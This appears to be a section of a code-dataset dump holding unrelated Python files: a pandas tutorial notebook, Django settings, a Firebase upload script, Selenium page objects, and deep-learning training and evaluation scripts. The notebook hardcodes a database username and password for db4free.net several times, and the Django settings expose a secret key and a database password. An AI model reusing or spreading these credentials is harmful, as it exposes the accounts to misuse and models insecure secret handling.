image\nplt.show()\n\n\n# In[88]:\n\n#Shows image information\nprint('Data type: %s, shape: %s' %(type(image), image.shape))\n\n\n# In[89]:\n\n#Crops the image\nimage2 = image[5:70,0:70]\nplt.imshow(image2, cmap=cm.gray)\nplt.show()\n\n\n# In[96]:\n\n#Resizing the image\nimage3 = resize(image2, (30, 30), mode='edge')\nplt.imshow(image3, cmap=cm.gray)\nprint(\"data type: %s, shape: %s\" % \n (type(image3), image3.shape))\nplt.show()\n\n\n# In[100]:\n\n#Flattening the image so one can add it to a data frame\nimage_row = image3.flatten()\nprint(\"data type: %s, shape: %s\" % \n (type(image_row), image_row.shape))\n\n\n# # Lendo de bancos de dados\n# [Voltar](#Índice)\n\n# In[21]:\n\nimport mysql.connector as con\nimport timeit\nimport pandas as pd\n\ndef test():\n # Open database connection\n db = con.connect(host=\"db4free.net\",user=\"g2798774\",password=\"~b~_^SD~2[mm+k4#\",database=\"test_schema\" )\n\n # prepare a cursor object using cursor() method\n cursor = db.cursor()\n\n # execute SQL query using execute() method.\n cursor.execute(\"SELECT * FROM TB_TITANIC\")\n\n # Fetch a single row using fetchone() method.\n df = pd.DataFrame(cursor.fetchall())\n \n #closes the connection\n db.close()\n\n# print('Number of data:', len(df))\n \nget_ipython().magic('timeit for i in range(5): test()')\n\n\n# In[19]:\n\ndef slowtest():\n #This method is toooooooooooo slow!\n import mysql.connector\n from sqlalchemy import create_engine\n\n #creates an engine to connect to database\n engine = create_engine('mysql+mysqlconnector://g2798774:~b~_^SD~2[mm+k4#@db4free.net/test_schema')\n\n #Execute SQL and stores results in a pandas dataframe\n df = pd.read_sql(\"SELECT * FROM TB_TITANIC\", engine)\n\n# print('Number of data:', len(df))\n\nget_ipython().magic('timeit for i in range(5): slowtest()')\n\n\n# In[12]:\n\ndef fastest():\n import pandas as pd\n import mysql.connector as con\n\n # Open database connection\n db = con.connect(host=\"db4free.net\",user=\"g2798774\",password=\"~b~_^SD~2[mm+k4#\",database=\"test_schema\" )\n\n #Execute SQL and stores results in a pandas dataframe\n df = pd.read_sql(\"SELECT * FROM TB_TITANIC\", db)\n\n db.close()\n\n print(df.describe())\n\nget_ipython().magic('timeit fastest()')\n\n\n# # Lendo arquivos XML\n# [Voltar](#Índice)\n\n# In[2]:\n\nfrom lxml import objectify\nimport pandas as pd\n\nxml = objectify.parse(open('XMLData.xml'))\nroot = xml.getroot()\ndf = pd.DataFrame(columns=('Number', 'String', 'Boolean'))\n\nfor i in range(0,4):\n obj = root.getchildren()[i].getchildren()\n row = dict(zip(['Number', 'String', 'Boolean'], \n [obj[0].text, obj[1].text, \n obj[2].text]))\n row_s = pd.Series(row)\n row_s.name = i\n df = df.append(row_s)\n \nprint(df)\n\n\n# # Condicionando os dados\n# * [Voltar](#Índice)\n# * [Tratando registros duplicados](#Tratando-registros-duplicados)\n# * [Criando o mapa e o plano de dados](#Criando-o-mapa-e-o-plano-de-dados)\n\n# ### Tratando registros duplicados\n# \n# [Up](#Condicionando-os-dados)\n\n# In[1]:\n\nfrom lxml import objectify\nimport pandas as pd\n\n#Reads XML file as example above\nxml = objectify.parse(open('XMLData2.xml'))\nroot = xml.getroot()\ndf = pd.DataFrame(columns=('Number', 'String', 'Boolean'))\n\nfor i in range(0,4):\n obj = root.getchildren()[i].getchildren()\n row = dict(zip(['Number', 'String', 'Boolean'], \n [obj[0].text, obj[1].text, \n obj[2].text]))\n row_s = pd.Series(row)\n row_s.name = i\n df = df.append(row_s)\n\n#Marks duplicated rows\nsearch = pd.DataFrame.duplicated(df)\n\nprint(df)\nprint('\\nDuplicated records:')\nprint(df[search == True])\nprint('\\nDataframe without duplicates')\ndf = df.drop_duplicates()\nprint(df)\n\n\n# ### Criando o mapa e o plano de dados\n# \n# [Up](#Condicionando-os-dados)\n\n# In[2]:\n\nimport mysql.connector as con\n\n# Open database connection\ndb = con.connect(host=\"db4free.net\",user=\"g2798774\",password=\"~b~_^SD~2[mm+k4#\",database=\"test_schema\" )\n\n#Execute SQL and stores results in a pandas dataframe\ndf = pd.read_sql(\"SELECT * FROM TB_TITANIC\", db)\n\ndb.close()\n\nsearch = pd.DataFrame.duplicated(df)\n\nif len(df[search == True]) == 0:\n print('No duplicate values found')\nelse:\n df = df.drop_duplicates()\n\n\n# In[36]:\n\nprint(df.head())\n\npclass_grouped = df.groupby('pclass').describe()\nprint(pclass_grouped)\nprint(pclass_grouped.unstack())\nprint(pclbass_grouped.unstack().loc[:,(slice(None),['count','mean','75%','max'])])\n\n\n# # Trabalhando com variáveis categóricas\n# * [Voltar](#Índice)\n# * [Criando variáveis categóricas](#Criando-variáveis-categóricas)\n# * [Renomeando níveis](#Renomeando-níveis)\n# * [Combinando níveis](#Combinando-níveis)\n\n# ### Criando variáveis categóricas\n# \n# [Up](#Trabalhando-com-variáveis-categóricas)\n\n# In[35]:\n\nimport pandas as pd\n\n#Creation of categories\ncar_colors = pd.Series(['Blue', 'Red', 'Green'], dtype='category')\n\n#Explicitly saying that the car data must follow the car_colors category\n#Entries that aren't found on categories list are NaNbb\ncar_data = pd.Series(\n pd.Categorical(['Yellow', 'Green', 'Red', 'Blue', 'Purple'],\n categories=list(car_colors), ordered=False))\n\nfind_entries = pd.isnull(car_data)\n\nprint(car_colors)\nprint('\\n')\nprint(car_data)\nprint('\\n')\nprint('Invalid entries:\\n', find_entries[find_entries == True], sep='')\n\n\n# ### Renomeando níveis\n# \n# [Up](#Trabalhando-com-variáveis-categóricas)\n\n# In[60]:\n\nimport pandas as pd\n\ncar_colors = ['Blue', 'Red', 'Green']\n\ncar_data = pd.Series(\n pd.Categorical(\n ['Blue', 'Green', 'Red', 'Blue', 'Red'],\n categories=car_colors, ordered=False))\n\nprint('Original car data\\n',car_data, '\\n', sep='')\n\n#Changing level names. Blue is now Purple, Red is now Yellow\ncar_colors = ['Purple', 'Yellow', 'Mauve']\ncar_data.cat.categories = car_colors\n\nprint('After renaming\\n',car_data, sep='')\n\n\n# ### Combinando níveis\n# \n# [Up](#Trabalhando-com-variáveis-categóricas)\n\n# In[71]:\n\nimport pandas as pd\n\ncar_colors = ['Blue', 'Red', 'Green']\ncar_data = pd.Series(\n pd.Categorical(\n ['Blue', 'Green', 'Red', 'Green', 'Red', 'Green'],\n categories=car_colors, ordered=False))\n\n#First, renames the Blue category to Blue_Red\ncar_data.cat.categories = ['Blue_Red', 'Red', 'Green']\nprint(car_data.ix[car_data.isin(['Red'])])\n\n#Now changes all Red (positions 2 and 4) elements to Blue_Red\ncar_data.ix[car_data.isin(['Red'])] = 'Blue_Red'\n\nprint('\\n')\nprint(car_data)\n\n\n# # Trabalhando com datas\n# [Voltar](#Índice)\n\n# In[5]:\n\nimport datetime as dt\n#Two different approaches on printing dates and times\nnow = dt.datetime.now()\nprint(str(now))\nprint(now.strftime('%a, %d %B %Y; %H:%M:%S'))#%a: weekday, %d: day, %B: Month, %Y: Year\n\n\n# In[8]:\n\nimport datetime as dt\nnow = dt.datetime.now() \n#Chaging local time by two timezones ie two hours\ntimevalue = now + dt.timedelta(hours=2)\nprint(now.strftime('%H:%M:%S'))\nprint(timevalue.strftime('%H:%M:%S'))\ntdelta = timevalue - now\nprint(tdelta)\n\n\n# # Tratando dados faltantes\n# * [Identificando dados faltantes](#Identificando-dados-faltantes)\n# * [Preenchendo dados faltantes](#Preenchendo-dados-faltantes)\n# * [Inferindo dados faltantes](#Inferindo-dados-faltantes)\n# \n# [Voltar](#Índice)\n\n# ### Identificando dados faltantes\n# [Up](#Tratando-dados-faltantes)\n\n# In[11]:\n\nimport pandas as pd\nimport numpy as np\n\ns = pd.Series([1, 2, 3, np.NaN, 5, 6, None])\n\nprint(s.isnull(),'\\n\\n')\n\nprint('The dataset contains ',len(s[s.isnull()]),' missing values which are\\n',s[s.isnull()],sep='')\n\n\n# ### Preenchendo dados faltantes\n# [Up](#Tratando-dados-faltantes)\n\n# In[16]:\n\nimport pandas as pd\nimport numpy as np\n\ns = pd.Series([1, 2, 3, np.NaN, 5, 6, None])\n\nprint(s.fillna(int(s.mean())))\nprint('\\n')\nprint(s.dropna())\n\n\n# ### Inferindo dados faltantes\n# [Up](#Tratando-dados-faltantes)\n\n# In[103]:\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import Imputer\n\ns = pd.Series([1, 2, 3, np.NaN, 5, 6, None])\n\n#axis = 0 means column\nimp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n\n#Need to use double brackets to explicit to new versions of numpy\n#That I am using a single-row array\n#This array is where numpy will calculate the mean\n#Since this is a single-row array when it tries to calculate\n#the mean of the 4th column, the mean is 4. So it fills the\n#blank with 4 and 7 if I make axis=0 above\nimp.fit([[1, 2, 3, 4, 5, 6, 7]])\n\nprint(s,'\\n')\n#Using reshape also to make clear to numpy that the series\n#s is a single-column array (1 column, -1 line)\nprint(pd.Series(imp.transform(s.reshape(1, -1))[0]))\n\n\n# # Fatiando\n# * [Filtrando linhas](#Filtrando-linhas)\n# * [Filtrando colunas](#Filtrando-colunas)\n# * [*Cortando em cubos*](#Cortando-em-cubos)\n# \n# [Voltar](#Índice)\n\n# ### Filtrando linhas\n# [Up](#Fatiando)\n\n# In[5]:\n\nimport numpy as np\n\nx = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9],],\n [[11,12,13], [14,15,16], [17,18,19],],\n [[21,22,23], [24,25,26], [27,28,29]]])\n\nx[1]\n\n\n# ### Filtrando colunas\n# [Up](#Fatiando)\n\n# In[27]:\n\nx = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9],],\n [[11,12,13], [14,15,16], [17,18,19],],\n [[21,22,23], [24,25,26], [27,28,29]]])\n\n#If you use x[:2] it will print all columns up to colume 2 (excluded)\n#Using x[:,2] shows only column 2 (third column)\nx[:,2]\n\n\n# ### Cortando em cubos\n# \"Cortar em cubos\" é o equivalente a pegar um conjunto de linhas e colunas de um dataset\n# \n# [Up](#Fatiando)\n\n# In[52]:\n\nx = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9],],\n [[11,12,13], [14,15,16], [17,18,19],],\n [[21,22,23], [24,25,26], [27,28,29]]])\n\nprint('x\\n',x,sep='')\nprint('\\nx[1,1]\\n',x[1,1],sep='')\nprint('\\nx[:,1,1]\\n',x[:,1,1], sep='')\nprint('\\nx[1,:,1]\\n',x[1,:,1],sep='')\n\nprint('\\nx[1:3, 0:2]\\n',x[1:3, 0:2],sep='')\n\n\n# # Concatenando e transformando\n# * [Adicionando casos e variáveis](#Adicionando-casos-e-variáveis)\n# * [Removendo dados](#Removendo-dados)\n# * [Ordenando e embaralhando](#Ordenando-e-embaralhando)\n# \n# [Voltar](#Índice)\n\n# ### Adicionando casos e variáveis\n# Para outras formas de unir dois *dataframes*: http://pandas.pydata.org/pandas-docs/stable/merging.html\n# \n# [Up](#Concatenando-e-transformando)\n\n# In[11]:\n\nimport pandas as pd\n\ndf = pd.DataFrame({'A': [2,3,1],\n 'B': [1,2,3],\n 'C': [5,3,4]})\n\ndf1 = pd.DataFrame({'A': [4],\n 'B': [4],\n 'C': [4]})\n\n#Easiest way to add new cases to a dataframe.\n#Use ignore_index = True or the new DataFrame will keep old indexes\ndf = df.append(df1, ignore_index=True)\nprint(df)\n\n#A more complex way to add a new case\ndf.loc[df.last_valid_index() + 1] = [5, 5, 5]\nprint('\\n',df,sep='')\n\ndf2 = pd.DataFrame({'D': [1, 2, 3, 4, 5]})\n\n#Joint the two dataframes on row index\n#This is why row indexing is so important\ndf = pd.DataFrame.join(df, df2)\nprint('\\n')\nprint(df)\n\n\n# ### Removendo dados\n# [Up](#Concatenando-e-transformando)\n\n# In[27]:\n\nimport pandas as pd\n\ndf = pd.DataFrame({'A': [2,3,1],\n 'B': [1,2,3],\n 'C': [5,3,4]})\n\ndf = df.drop(df.index[[1]])\nprint(df)\n\ndf = df.drop('B', 1)\nprint('\\n')\nprint(df)\n\n\n# ### Ordenando e embaralhando\n# [Up](#Concatenando-e-transformando)\n\n# In[30]:\n\nimport pandas as pd\nimport numpy as np\n\ndf = pd.DataFrame({'A': [2,1,2,3,3,5,4],\n 'B': [1,2,3,5,4,2,5],\n 'C': [5,3,4,1,1,2,3]})\n\ndf = df.sort_values(by=['A', 'B'], ascending=[True, True])\nprint('Sorting...\\n')\nprint(df)\nprint('\\nReset index\\n')\ndf = df.reset_index(drop=True)\nprint(df)\n\n\nindex = df.index.tolist()\nnp.random.shuffle(index)\ndf = df.ix[index]\ndf = df.reset_index(drop=True)\nprint('\\nSuffling data\\n')\nprint(df)\n\n\n# # Agregação\n# [Voltar](#Índice)\n\n# In[39]:\n\nimport pandas as pd\n\ndf = pd.DataFrame({'Map': [0,0,0,1,1,2,2],\n 'Values': [1,2,3,5,4,2,5]})\n\ndf['S'] = df.groupby('Map')['Values'].transform(np.sum)\ndf['M'] = df.groupby('Map')['Values'].transform(np.mean)\ndf['V'] = df.groupby('Map')['Values'].transform(np.var)\n\nprint(df)\nprint('\\n')\nprint(df[['Map','S','M','V']].drop_duplicates().reset_index(drop=True))\n\n","sub_path":"_Minhas anotações e testes.py","file_name":"_Minhas anotações e testes.py","file_ext":"py","file_size_in_byte":22437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"459153543","text":"\"\"\"\nDjango settings for ops project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'wdj$%*z%j#&@gkg^ao+f50i9f6@_7_ms*4$i5=+5#p@5&y36*_'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'haystack',\n #'south',\n 'cmdb',\n 'rest_framework.authtoken'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n)\n\nROOT_URLCONF = 'ops.urls'\n\nWSGI_APPLICATION = 'ops.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\nDATABASES = {\n 'default': {\n #'ENGINE': 'django.db.backends.sqlite3',\n #'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME':'cmdb',\n 'USER':'cmdb',\n 'PASSWORD':'cmdbpassword',\n 'HOST':'127.0.0.1',\n 'PORT':'3306',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\n#TIME_ZONE = 'UTC'\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n#STATIC_ROOT = '/opt/web/ops/static/'\n\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.solr_backend.SolrEngine',\n 'URL': 'http://127.0.0.1:8983/solr/cmdb'\n # ...or for multicore...\n # 'URL': 'http://127.0.0.1:8983/solr/mysite',\n },\n}\nLOGIN_URL = '/cmdb/login'\nSESSION_SAVE_EVERY_REQUEST = True\n","sub_path":"ops/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"615026825","text":"import os\nimport json\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import storage\n\ncred = credentials.Certificate(\"serviceKey.json\")\n\nfirebase_admin.initialize_app(cred, {\n 'storageBucket': 'wbusch-f8fb7.appspot.com'\n})\n\nbucket = storage.bucket()\n\nfiltros = []\n\ndef upload_blob(source_file_name, destination_blob_name):\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(\n source_file_name,\n content_type=\"image/jpg\"\n )\n\n print('File {} uploaded to {}.'.format(\n source_file_name,\n destination_blob_name))\n\n url = blob.public_url\na = 0\nwith open(\"filtros.json\", \"r+\") as f:\n filtros = json.load(f)\n for i, filtro in enumerate(filtros):\n try:\n blob = bucket.blob(\"opt/\" + filtro[\"Title\"] + \".jpg\")\n\n blob.upload_from_filename(\n \"optimized/\" + filtro[\"Title\"] + \".jpg\",\n content_type=\"image/jpg\"\n )\n url = blob.public_url\n filtros[i][\"imagen\"] = url\n a = a+1\n print(a)\n except:\n pass\n # filtros = json.dump(filtros)\n # f.write(filtros)\n # f.close()\n\n# for fn in os:\n # upload_blob(\"img/\" + fn, \"img/\" + fn)","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24369952","text":"# -*- coding: utf-8 -*-\n\nfrom items import InputWithName, BtnWithClass, DropMenuWithText, BtnWithText, DropMenuWithTitle, PopMenuWithName\nfrom util import toDict\nfrom commonPage import CommonPage, TablePage\n\nclass AddForm(CommonPage):\n\n\tdef __init__(self, driver):\n\n\t\tCommonPage.__init__(self, driver)\n\n\t\tformDriver = self.entry_form_by_id(id_= 'addBtn', formId= 'addModal')\n\n\t\taddForm = {\n\t\t\t'saleAreaName': InputWithName(formDriver, 'saleAreaName'),\n\t\t\t'remark': InputWithName(formDriver, 'remark'),\n\t\t\t'pSaleAreaName': DropMenuWithTitle(formDriver, 'pSaleAreaName'),\n\t\t\t'saleAreaManagerName': PopMenuWithName(formDriver, dict(driver= driver, formId= 'srhMgrForm', srcName= 'userName', tblId= 'sautbl', btnOk= 'getMgrBtn'), name_= 'saleAreaManagerName'),\n\t\t\t'cancel': BtnWithText(formDriver, '取消'),\n\t\t\t'submit': BtnWithText(formDriver, '保存'),\n\t\t}\n\n\t\tself.sort = ['saleAreaName', 'pSaleAreaName', 'saleAreaManagerName', 'remark']\n\n\t\tself.addForm = toDict(addForm)\n\n\n\n\nclass SearchForm(CommonPage):\n\n\tdef __init__(self, driver):\n\n\t\tCommonPage.__init__(self, driver)\n\n\t\tformDriver = self.entry_form_by_text(text= '高级查询', formId= 'searchModal')\n\n\t\tsearchForm = {\n\t\t\t'saleAreaName': InputWithName(formDriver, 'saleAreaName'),\n\t\t\t'saleAreaManagerName': InputWithName(formDriver, 'saleAreaManagerName'),\n\t\t\t'status': DropMenuWithText(formDriver, 'status'),\n\t\t\t'search': BtnWithText(formDriver, '查询'),\n\t\t}\n\n\t\tself.searchForm = toDict(searchForm)\n\n\nclass TableForm(TablePage):\n\n\tdef __init__(self, driver):\n\n\t\tTablePage.__init__(self, driver)\n\n\t\tself.tableId = 'satbl'\n\n\t\tself.tableList = ['checkbox', 'pSaleAreaName', 'saleAreaName', 'saleAreaManagerName', 'remark', 'stauts']\n\n\ndef change_manager(driver, managerName):\n\tbind_menu = PopMenuWithName(driver, dict(driver= driver, formId= 'mgrForm4bind', srcName= 'userName', tblId= 'sautbl4bind', btnOk= 'bindModal_okBtn'), id_= 'bindBtn')\n\tbind_menu.choose(managerName)\t","sub_path":"atdriver/saleareaPage.py","file_name":"saleareaPage.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382400887","text":"from ratelimit.version import Version\nfrom tests import unittest\n\nclass TestVersion(unittest.TestCase):\n\n def test_set_version(self):\n ver = Version('1.0.0')\n self.assertEqual(ver.number, '1.0.0')\n\n def test_version_immutable(self):\n ver = Version('1.0.0')\n with self.assertRaises(TypeError):\n ver.number = '1.1.0'\n","sub_path":"tests/unit/version_test.py","file_name":"version_test.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439655314","text":"from tkinter import* \r\nfrom tkinter import messagebox\r\n\r\n\r\n# 7\r\ndef onClick():\r\n data1 = text.get()\r\n messagebox.showinfo(\"입력받은값\", data1) # 5\r\n print(\"입력받은값\", data1)\r\n\r\n# Tk() 화면 출력 1\r\nwindow = Tk()\r\n\r\n# 3\r\nname = Label(window, text = \"이름을 입력하세요\")\r\nname.pack()\r\n\r\n# 4\r\ntext = Entry(window)\r\ntext.pack()\r\n\r\n#버튼 생성 후 빈화면에 얹기 2 , 6\r\nbtn = Button(window,text = \"입력버튼\", command = onClick)\r\nbtn.pack()\r\n\r\n\r\nwindow.mainloop()","sub_path":"python01_190330/test/dialogue.py","file_name":"dialogue.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"592593411","text":"import torchvision\nimport torchvision.datasets as tdatasets\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport torchvision.utils\nimport numpy as np\nimport random\nfrom PIL import Image\nimport torch\n#from dataset import SiameseNetworkDataset\nfrom trainsiamesedataset import SiameseNetworkDataset\nfrom FacesDataset import FacesDataset\nfrom testsiamesedataset import SiameseTestDataset\nfrom model import SiameseNetwork, ContrastiveLoss\nfrom torch import optim\nimport torch.nn.functional as F\nimport torch.nn as nn\n\ndef imshow(img,text=None,should_save=False):\n npimg = img.numpy()\n plt.axis(\"off\")\n if text:\n plt.text(75, 8, text, style='italic',fontweight='bold',\n bbox={'facecolor':'white', 'alpha':0.8, 'pad':10})\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\ndef split_train_val(train):\n examples = {}\n for example in train:\n data, label = example\n if label.item() not in examples:\n examples[label.item()] = []\n examples[label.item()].append(example)\n\n validation_size = 0.2\n # for label in examples:\n # print(label, len(examples[label]))\n train_80 = []\n valid_20 = []\n for label in examples:\n sample_size = int(np.floor(0.2 * len(examples[label])))\n choices = np.random.choice(len(examples[label]), sample_size, replace=False)\n # print(len(choices), len(examples[label]), sample_size)\n for choice in choices:\n valid_20.append(examples[label][choice])\n for i in range(len(examples[label])):\n if not i in choices:\n train_80.append(examples[label][i])\n\n\n\n return train_80, valid_20\n\n\ndef main():\n device = torch.device('cuda:9' if torch.cuda.is_available else 'cpu')\n train_dataset_dir = tdatasets.ImageFolder('images/all')\n train_dataset = SiameseNetworkDataset(imageFolderDataset = train_dataset_dir, transform = transforms.Compose([transforms.Resize((100,100)), transforms.ToTensor()]))\n vis_dataloader = DataLoader(train_dataset,\n shuffle=False,\n num_workers=0,\n batch_size=10)\n\n # dataiter = iter(vis_dataloader)\n # example_batch = next(dataiter)\n # concatenated = torch.cat((example_batch[0],example_batch[1]),0)\n # imshow(torchvision.utils.make_grid(concatenated))\n # print(example_batch[2].numpy())\n #\n # example_batch = next(dataiter)\n # concatenated = torch.cat((example_batch[0], example_batch[1]), 0)\n # imshow(torchvision.utils.make_grid(concatenated))\n # print(example_batch[2].numpy())\n net = SiameseNetwork()\n criterion = ContrastiveLoss()\n optimizer = optim.Adam(net.parameters(),lr = 0.0005 )\n loss_vals = []\n '''\n Training Starts\n '''\n print('Training started')\n for epoch in range(10):\n loss_epoch = 0\n for i, data in enumerate(vis_dataloader,0):\n img_0, img_1, label = data\n print(i, label)\n # img_0, img_1, label = img_0.to(device), img_1.to(device), label.to(device)\n optimizer.zero_grad()\n out_0, out_1 = net(img_0, img_1)\n loss = criterion(out_0, out_1, label)\n loss_epoch += loss.item()\n loss.backward()\n optimizer.step()\n loss_vals.append(loss_epoch)\n print('Epoch',str(epoch+1), str(loss_epoch))\n print('Epoch done')\n torch.save(net.state_dict(), 'siamese.pt')\n print('Training completed')\n plt.plot(loss_vals)\n plt.savefig('loss_siamese.png')\n \n\n # ****************************** Training ends ***************************************\n\n\n '''\n Testing starts\n '''\n# net.load_state_dict(torch.load('siamese.pt'))\n# test_dataset = SiameseTestDataset(train_dataset_dir, \\\n# transform=transforms.Compose([transforms.Resize((100, 100)), transforms.ToTensor()]))\n# test_vis_dataloader = DataLoader(test_dataset,\n# shuffle=False,\n# num_workers=0,\n# batch_size=1)\n#\n# train_dataset_dir = tdatasets.ImageFolder('images/all')\n# train_dataset = FacesDataset(train_dataset_dir, \\\n# transform=transforms.Compose([transforms.Resize((100, 100)), transforms.ToTensor()]))\n#\n# _, test = split_train_val(train_dataset)\n# test_dataloader = DataLoader(test,\n# shuffle=False,\n# num_workers=0,\n# batch_size=1)\n# correct = 0\n# total = 0\n# for i, data in enumerate(test_dataloader, 0):\n# total += 1\n# img_1, labels = data\n# min_dist = float(\"inf\")\n# pred = -1\n# print('Testing begins', i)\n# for j, data_test_vis in enumerate(test_vis_dataloader, 0):\n# img_0 = data_test_vis\n# out_0, out_1 = net(img_0, img_1)\n# dist = F.pairwise_distance(out_0, out_1)\n# if min_dist > dist:\n# min_dist = dist\n# pred = j\n# if pred == labels.item():\n# correct += 1\n# print('Testing ends', i, pred)\n#\n# print('Accuracy: ',str(correct/total))\n#\n\n\n\n# test_dataset_dir = tdatasets.ImageFolder('images/test')\n # net.load_state_dict(torch.load('siamese.pt'))\n # test_dataset = SiameseNetworkDataset(imageFolderDataset = test_dataset_dir, transform = transforms.Compose([transforms.Resize((100,100)), transforms.ToTensor()]))\n\n# test_dataloader = DataLoader(test_dataset,\n# shuffle=True,\n# num_workers=2,\n# batch_size=1)\n# print('Testing starts')\n# correct = 0\n# total = 0\n# test_img_sub = None\n# for i, data in enumerate(test_dataloader, 0):\n# img_0, img_1, label = data\n# if test_img_sub is None:\n# test_img_sub = img_0\n# #concat = torch.cat((test_img_sub, img_1), 0)\n# concat = torch.cat((img_0, img_1), 0)\n# #test_img_sub, img_1, label = test_img_sub.to(device), img_1.to(device), label.to(device)\n# img_0, img_1, label = img_0.to(device), img_1.to(device), label.to(device)\n# out_0, out_1 = net(img_0, img_1)\n# dist = F.pairwise_distance(out_0, out_1)\n# if dist <= 0.5 and label == 0:\n# correct = correct + 1\n# elif label == 1:\n# correct = correct + 1\n# else:\n# pass\n# total = total + 1\n# #imshow(torchvision.utils.make_grid(concat),'Dissimilarity: {:.2f}'.format(dist.item()))\n# test_img_sub = test_img_sub.cpu()\n# # dist = dist.cpu().detach()\n# # print(dist.numpy())\n# # dist = torch.sigmoid(dist)\n# # print(dist.numpy())\n# print(correct/total)\n#\n#\n# print('Testing complete')\n\n\n\n #example_batch = next(dataiter)\n #concatenated = torch.cat((example_batch[0],example_batch[1]),0)\n # imshow(torchvision.utils.make_grid(concatenated))\n #print(example_batch[2].numpy())\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"siamese_run.py","file_name":"siamese_run.py","file_ext":"py","file_size_in_byte":7171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"400577326","text":"import argparse\nimport logging\nimport os\nimport sys\nimport time\n\nfrom torch.utils.data import DataLoader\n\nsys.path.append(\"..\")\nsys.path.append(\"../../\")\nfrom tqdm import tqdm\n\nfrom code_search.twin.twin_eval import get_eval_args\nfrom code_search.twin.twin_train import load_examples\n\nimport torch\nfrom transformers import BertConfig\nfrom common.models import TBertS\nfrom common.metrices import metrics\nfrom common.utils import MODEL_FNAME, results_to_df, format_batch_input_for_single_bert\n\n\ndef test(args, model, eval_examples, chunk_size=1000):\n if not os.path.isdir(args.output_dir):\n os.makedirs(args.output_dir)\n retr_res_path = os.path.join(args.output_dir, \"raw_result.csv\")\n cache_file = \"cached_single_test.dat\"\n if args.overwrite or not os.path.isfile(cache_file):\n chunked_retrivial_examples = eval_examples.get_chunked_retrivial_task_examples(\n chunk_query_num=args.chunk_query_num,\n chunk_size=chunk_size)\n torch.save(chunked_retrivial_examples, cache_file)\n else:\n chunked_retrivial_examples = torch.load(cache_file)\n retrival_dataloader = DataLoader(chunked_retrivial_examples, batch_size=args.per_gpu_eval_batch_size)\n\n res = []\n for batch in tqdm(retrival_dataloader, desc=\"retrival evaluation\"):\n nl_ids = batch[0]\n pl_ids = batch[1]\n labels = batch[2]\n with torch.no_grad():\n model.eval()\n inputs = format_batch_input_for_single_bert(batch, eval_examples, model)\n sim_score = model.get_sim_score(**inputs)\n for n, p, prd, lb in zip(nl_ids.tolist(), pl_ids.tolist(), sim_score, labels.tolist()):\n res.append((n, p, prd, lb))\n\n df = results_to_df(res)\n df.to_csv(retr_res_path)\n m = metrics(df, output_dir=args.output_dir)\n return m\n\n\nif __name__ == \"__main__\":\n args = get_eval_args()\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n res_file = os.path.join(args.output_dir, \"./raw_res.csv\")\n\n cache_dir = os.path.join(args.data_dir, \"cache\")\n cached_file = os.path.join(cache_dir, \"test_examples_cache.dat\".format())\n\n logging.basicConfig(level='INFO')\n logger = logging.getLogger(__name__)\n\n if not os.path.isdir(args.output_dir):\n os.makedirs(args.output_dir)\n\n model = 